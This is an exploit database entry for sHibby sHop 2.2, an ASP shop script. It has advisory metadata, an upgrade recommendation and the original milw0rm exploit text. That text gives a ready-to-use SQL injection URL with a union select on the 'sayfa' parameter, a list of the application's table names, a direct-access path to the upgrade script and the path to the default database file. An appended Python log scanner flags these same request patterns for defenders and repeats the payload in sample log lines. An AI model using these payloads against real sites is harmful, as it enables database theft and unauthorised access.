Vendor: Shibby Shop
By: KnocKout
CVSS: 9.3 HIGH
SQL Injection and Direct Access
CWE: 89
Product Name: Shibby Shop
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: CVE-2008-3123
CPE: a:shibby_shop:shibby_shop:2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

sHibby sHop v2.2 is prone to a remote SQL injection vulnerability and a direct access vulnerability. An attacker can exploit these issues to manipulate SQL queries, access sensitive information, and gain access to the underlying file system.

Mitigation:

Upgrade to the latest version of sHibby sHop.

Exploit-DB raw data:

Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

================================================================

[+] Author : KnocKout
[+] Special Thankz : Dr.Kacak
[+] System 0VerfL0verZ

=================================================================

Script : sHibby sHop
Verz: 2.2
Download : http://aspindir.com/goster/4476

 

SQL attack ;

http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar

Tables;

yasakli
ustmenu
urun_yorum
urun
ureticiler
tema
site_gel
siparis
sayfa
say_site
say_ip
say_hit
online
kategori
banner
ayarlar

 ------------
 
 Update file ( Direct Access )

 http://localsite.com/path/upgrade.asp
 

And default Database file

http://target.com/path/Db/urun.mdb

###############################################################

# milw0rm.com [2008-06-22]
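
A defender-side check for the three request patterns in the advisory above, as an added example (not part of the original advisory or of sHibby sHop): it scans web access log entries for non-numeric `git`/`sayfa` values, requests to `upgrade.asp`, and `.mdb` downloads. The simplified log format, the function names and the assumption that `git` and `sayfa` are integer-only are illustrative; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory's URL shows carrying numeric values (assumed integer-only).
NUMERIC_PARAMS = {"git", "sayfa"}
SQL_TOKENS = re.compile(r"\b(union|select|from|insert|update|delete|drop)\b", re.I)

def classify(request_target):
    """Return a sorted list of finding labels for one request target (path + query)."""
    parts = urlsplit(request_target)
    path = parts.path.lower()
    findings = set()
    # Direct access to the upgrade script named in the advisory.
    if path.endswith("/upgrade.asp"):
        findings.add("upgrade-script-access")
    # Download attempt on an Access database file (the advisory names Db/urun.mdb).
    if path.endswith(".mdb"):
        findings.add("database-file-download")
    # parse_qsl decodes %xx and '+' so encoded payloads are normalised before matching.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.add("non-numeric-" + name.lower())
        if SQL_TOKENS.search(value):
            findings.add("sql-keyword-in-query")
    return sorted(findings)

def scan(log_lines):
    """Yield (client_ip, target, findings) for lines in 'ip method target status' form."""
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed lines instead of raising
        ip, _method, target = fields[0], fields[1], fields[2]
        findings = classify(target)
        if findings:
            yield ip, target, findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    "192.0.2.10 GET /shop/default.asp?git=4&sayfa=2 200",
    "198.51.100.7 GET /shop/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar 200",
    "198.51.100.7 GET /shop/default.asp?git=4&sayfa=-3%20UNION%20ALL%20SELECT%200 200",
    "198.51.100.7 GET /shop/upgrade.asp 200",
    "203.0.113.5 GET /shop/Db/urun.mdb 200",
]

if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, ",".join(findings))
```

A 200 status on the `upgrade.asp` or `.mdb` hits means the file was actually served, so those entries warrant immediate follow-up.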